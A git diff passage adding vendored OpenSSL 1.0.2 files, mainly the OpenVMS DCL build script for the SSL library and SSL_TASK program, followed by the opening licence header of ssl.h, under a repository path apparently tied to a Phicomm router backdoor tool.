+$!
+$! Create The Source File Name.
+$!
+$ SOURCE_FILE = "SYS$DISK:[]" + FILE_NAME + ".C"
+$!
+$! Create The Object File Name.
+$!
+$ OBJECT_FILE = OBJ_DIR + FILE_NAME + ".OBJ"
+$ ON WARNING THEN GOTO NEXT_FILE
+$!
+$! Check To See If The File We Want To Compile Is Actually There.
+$!
+$ IF (F$SEARCH(SOURCE_FILE).EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The File Exists Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What File We Are Compiling.
+$!
+$ WRITE SYS$OUTPUT "	",FILE_NAME,".c"
+$!
+$! Compile The File.
+$!
+$ ON ERROR THEN GOTO NEXT_FILE
+$ CC/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$!
+$! Add It To The Library.
+$!
+$ LIBRARY/REPLACE/OBJECT 'SSL_LIB' 'OBJECT_FILE'
+$!
+$! Time To Clean Up The Object File.
+$!
+$ DELETE 'OBJECT_FILE';*
+$!
+$! Go Back And Get The Next File Name.
+$!
+$ GOTO NEXT_FILE
+$!
+$! All Done With This Library.
+$!
+$ FILE_DONE:
+$!
+$! Tell The User That We Are All Done.
+$!
+$ WRITE SYS$OUTPUT "Library ",SSL_LIB," Compiled."
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$ SSL_TASK:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Is Actually There.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]SSL_TASK.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File SSL_TASK.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The SSL_TASK.C File Check.
+$!
+$ ENDIF
+$!
+$ COMPILEWITH_CC5 = "" !!! ",ssl_task,"
+$!
+$! Tell The User We Are Creating The SSL_TASK.
+$!
+$! Tell The User We Are Creating The SSL_TASK.
+$!
+$ WRITE SYS$OUTPUT "Creating SSL_TASK OSU HTTP SSL Engine."	
+$!
+$!  Tell The User What File We Are Compiling.
+$!
+$ FILE_NAME = "ssl_task"
+$ WRITE SYS$OUTPUT "	",FILE_NAME,".c"
+$!
+$! Compile The File.
+$!
+$ ON ERROR THEN GOTO SSL_TASK_END
+$!
+$ FILE_NAME0 = ","+ F$ELEMENT(0,".",FILE_NAME)+ ","
+$ IF COMPILEWITH_CC5 - FILE_NAME0 .NES. COMPILEWITH_CC5
+$ THEN
+$   if (.not. CC5_SHOWN)
+$   then
+$     CC5_SHOWN = 1
+$     write sys$output "        \Using special rule (5)"
+$     x = "    "+ CC5
+$     write /symbol sys$output x
+$   endif
+$   CC5 /OBJECT='OBJ_DIR''FILE_NAME'.OBJ SYS$DISK:[]'FILE_NAME'.C
+$ ELSE
+$   CC /OBJECT='OBJ_DIR''FILE_NAME'.OBJ SYS$DISK:[]'FILE_NAME'.C
+$ ENDIF
+$!
+$! Link The Program.
+$!
+$ LINK /'DEBUGGER' /'LINKMAP' /'TRACEBACK' /EXE='EXE_DIR'SSL_TASK.EXE -
+   'OBJ_DIR'SSL_TASK.OBJ, -
+   'SSL_LIB'/LIBRARY, -
+   'CRYPTO_LIB'/LIBRARY -
+   'TCPIP_LIB' -
+   'ZLIB_LIB' -
+   ,'OPT_FILE' /OPTIONS
+$!
+$! Time To Return.
+$!
+$SSL_TASK_END:
+$ RETURN
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB/LIBRARY
+SYS$SHARE:VAXCRTL/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need A non-VAX Or A VAX Linker Option File.
+$!
+$     IF (ARCH.EQS."VAX")
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE/SHARE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Against 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR/SHARE
+SYS$SHARE:CMA$OPEN_RTL/SHARE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."	
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$ LIB_CHECK:
+$!
+$! Look For The VAX Library LIBSSL.OLB.
+$!
+$ IF (F$SEARCH(SSL_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBSSL.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",SSL_LIB,"."
+$   WRITE SYS$OUTPUT "We Can't Link Without It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The LIBSSL.OLB Library Check.
+$!
+$ ENDIF
+$!
+$! Look For The Library LIBCRYPTO.OLB.
+$!
+$ IF (F$SEARCH(CRYPTO_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBCRYPTO.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",CRYPTO_LIB,"."
+$   WRITE SYS$OUTPUT "We Can't Link Without It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The LIBCRYPTO.OLB Library Check.
+$!
+$ ENDIF
+$!
+$! Time To Return.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check To See If P1 Is Blank.
+$!
+$ IF (P1.EQS."ALL")
+$ THEN
+$!
+$!   P1 Is Blank, So Build Everything.
+$!
+$    BUILDALL = "TRUE"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Else, Check To See If P1 Has A Valid Argument.
+$!
+$   IF (P1.EQS."LIBRARY").OR.(P1.EQS."SSL_TASK")
+$   THEN
+$!
+$!    A Valid Argument.
+$!
+$     BUILDALL = P1
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P1," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALL      :  Just Build Everything."
+$     WRITE SYS$OUTPUT "    LIBRARY  :  To Compile Just The [.xxx.EXE.SSL]LIBSSL.OLB Library."
+$     WRITE SYS$OUTPUT "    SSL_TASK :  To Compile Just The [.xxx.EXE.SSL]SSL_TASK.EXE Program."
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT " Where 'xxx' Stands For:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALPHA[64]:  Alpha Architecture."
+$     WRITE SYS$OUTPUT "    IA64[64] :  IA64 Architecture."
+$     WRITE SYS$OUTPUT "    VAX      :  VAX Architecture."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P2 Is Blank.
+$!
+$ IF (P2.EQS."NODEBUG")
+$ THEN
+$!
+$!  P2 Is NODEBUG, So Compile Without Debugger Information.
+$!
+$   DEBUGGER  = "NODEBUG"
+$   LINKMAP = "NOMAP"
+$   TRACEBACK = "NOTRACEBACK" 
+$   GCC_OPTIMIZE = "OPTIMIZE"
+$   CC_OPTIMIZE = "OPTIMIZE"
+$   WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$   WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P2.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER  = "DEBUG"
+$     LINKMAP = "MAP"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$   ELSE
+$!
+$!    Tell The User Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P2," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    DEBUG    :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "    NODEBUG  :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P2 Check.
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P5.
+$!
+$ IF (P5.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P5 Check.
+$!
+$ ENDIF
+$!
+$! Check P6 (POINTER_SIZE).
+$!
+$ IF (P6 .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (P6 .EQS. "32")
+$   THEN
+$     POINTER_SIZE = " /POINTER_SIZE=32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( P6, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$       POINTER_SIZE = " /POINTER_SIZE=64"
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", P6, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"       :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32       :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       EXIT
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The P6 (POINTER_SIZE) Check.
+$!
+$ ENDIF
+$!
+$! Set basic C compiler /INCLUDE directories.
+$!
+$ CC_INCLUDES = "SYS$DISK:[-.CRYPTO],SYS$DISK:[-]"
+$!
+$! Check To See If P3 Is Blank.
+$!
+$ IF (P3.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     P3 = "GNUC"
+$!
+$!  End The GNU C Compiler Check.
+$!
+$   ELSE
+$!
+$!  Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       P3 = "DECC"
+$!
+$!      Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       P3 = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have A Option For P4.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  Find out what socket library we have available
+$!
+$   IF F$PARSE("SOCKETSHR:") .NES. ""
+$   THEN
+$!
+$!    We have SOCKETSHR, and it is my opinion that it's the best to use.
+$!
+$     P4 = "SOCKETSHR"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Else, let's look for something else
+$!
+$   ELSE
+$!
+$!    Like UCX (the reason to do this before Multinet is that the UCX
+$!    emulation is easier to use...)
+$!
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. "" -
+	 .OR. F$PARSE("SYS$SHARE:UCX$IPC_SHR.EXE") .NES. "" -
+	 .OR. F$PARSE("SYS$LIBRARY:UCX$IPC.OLB") .NES. ""
+$     THEN
+$!
+$!	Last resort: a UCX or UCX-compatible library
+$!
+$	P4 = "UCX"
+$!
+$!      Tell the user
+$!
+$       WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!	That was all...
+$!
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = "TCPIP_TYPE_''P4'"
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = CCDEFS + "," + USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = "" !!! "MAYLOSEDATA3" !!! "LONGLONGTYPE,LONGLONGSUFX,FOUNDCR"
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. ""
+$ THEN
+$     IF CCDISABLEWARNINGS .NES. THEN CCDISABLEWARNINGS = CCDISABLEWARNINGS + ","
+$     CCDISABLEWARNINGS = CCDISABLEWARNINGS + USER_CCDISABLEWARNINGS
+$ ENDIF
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ ZLIB = P7
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$   file1 = f$parse( "A.;", ZLIB)- "A.;"
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     EXIT
+$   endif
+$!
+$   CCDEFS = """ZLIB=1"", "+ CCDEFS
+$   CC_INCLUDES = CC_INCLUDES+ ", "+ file1
+$   ZLIB_LIB = ", ''file2' /library"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The ZLIB Check.
+$!
+$ ENDIF
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$ IF (P3.EQS."VAXC").OR.(P3.EQS."DECC").OR.(P3.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If The User Wanted DECC.
+$!
+$   IF (P3.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC/DECC"
+$     CC = CC + " /''CC_OPTIMIZE' /''DEBUGGER' /STANDARD=RELAXED"+ -
+       "''POINTER_SIZE' /NOLIST /PREFIX=ALL" + -
+       " /INCLUDE=(''CC_INCLUDES') " + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (P3.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on ''ARCH'!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC/VAXC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$     CCDEFS = CCDEFS + ",""VAXC"""
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE/NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (P3.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     IF F$TYPE(GCC) .EQS. "" THEN GCC := GCC
+$     CC = GCC+"/NOCASE_HACK/''GCC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Finish up the definition of CC.
+$!
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$!    Not all compiler versions support MAYLOSEDATA3.
+$     OPT_TEST = "MAYLOSEDATA3"
+$     DEFINE /USER_MODE SYS$ERROR NL:
+$     DEFINE /USER_MODE SYS$OUTPUT NL:
+$     'CC' /NOCROSS_REFERENCE /NOLIST /NOOBJECT -
+       /WARNINGS = DISABLE = ('OPT_TEST', EMPTYFILE) NL:
+$     IF ($SEVERITY)
+$     THEN
+$       IF CCDISABLEWARNINGS .NES. "" THEN -
+         CCDISABLEWARNINGS = CCDISABLEWARNINGS+ ","
+$       CCDISABLEWARNINGS = CCDISABLEWARNINGS+ OPT_TEST
+$     ENDIF
+$     IF CCDISABLEWARNINGS .EQS. ""
+$     THEN
+$       CC4DISABLEWARNINGS = "DOLLARID"
+$     ELSE
+$       CC4DISABLEWARNINGS = CCDISABLEWARNINGS + ",DOLLARID"
+$       CCDISABLEWARNINGS = " /WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$     ENDIF
+$     CC4DISABLEWARNINGS = " /WARNING=(DISABLE=(" + CC4DISABLEWARNINGS + "))"
+$   ELSE
+$     CCDISABLEWARNINGS = ""
+$     CC4DISABLEWARNINGS = ""
+$   ENDIF
+$   CC2 = CC + " /DEFINE=(" + CCDEFS + ",_POSIX_C_SOURCE)" + CCDISABLEWARNINGS
+$   CC3 = CC + " /DEFINE=(" + CCDEFS + ISSEVEN + ")" + CCDISABLEWARNINGS
+$   CC = CC + " /DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$     CC4 = CC - CCDISABLEWARNINGS + CC4DISABLEWARNINGS
+$     CC5 = CC3 - CCDISABLEWARNINGS + CC4DISABLEWARNINGS
+$   ELSE
+$     CC4 = CC
+$     CC5 = CC3
+$   ENDIF
+$!
+$!  Show user the result
+$!
+$   WRITE/SYMBOL SYS$OUTPUT "Main Compiling Command: ",CC
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$ ENDIF
+$!
+$! Time to check the contents, and to make sure we get the correct library.
+$!
+$ IF P4.EQS."SOCKETSHR" .OR. P4.EQS."MULTINET" .OR. P4.EQS."UCX" -
+     .OR. P4.EQS."TCPIP" .OR. P4.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF P4.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF P4.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     P4 = "UCX"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF P4.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. ""
+$     THEN
+$       TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC_LOG.OPT /OPTIONS"
+$     ELSE
+$       IF COMPILER .NES. "DECC" .AND. ARCH .EQS. "VAX" THEN -
+	  TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_VAXC.OPT /OPTIONS"
+$     ENDIF
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP was chosen
+$!
+$   IF P4.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP (post UCX).
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF P4.EQS."NONE"
+$   THEN
+$!
+$!    Do not use a TCPIP library.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Done with NONE
+$!
+$   ENDIF
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB- ","
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P4," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$   WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$   WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP (post UCX) TCP/IP library."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ INITIALISE:
+$!
+$! Save old value of the logical name OPENSSL
+$!
+$ __SAVE_OPENSSL = F$TRNLNM("OPENSSL","LNM$PROCESS_TABLE")
+$!
+$! Save directory information
+$!
+$ __HERE = F$PARSE(F$PARSE("A.;",F$ENVIRONMENT("PROCEDURE"))-"A.;","[]A.;") - "A.;"
+$ __HERE = F$EDIT(__HERE,"UPCASE")
+$ __TOP = __HERE - "SSL]"
+$ __INCLUDE = __TOP + "INCLUDE.OPENSSL]"
+$!
+$! Set up the logical name OPENSSL to point at the include directory
+$!
+$ DEFINE OPENSSL/NOLOG '__INCLUDE'
+$!
+$! Done
+$!
+$ RETURN
+$!
+$ CLEANUP:
+$!
+$! Restore the logical name OPENSSL if it had a value
+$!
+$ IF __SAVE_OPENSSL .EQS. ""
+$ THEN
+$   DEASSIGN OPENSSL
+$ ELSE
+$   DEFINE/NOLOG OPENSSL '__SAVE_OPENSSL'
+$ ENDIF
+$!
+$! Done
+$!
+$ RETURN
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl.h
new file mode 100644
index 0000000..2b0f662
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl.h
@@ -0,0 +1,3159 @@
+/* ssl/ssl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
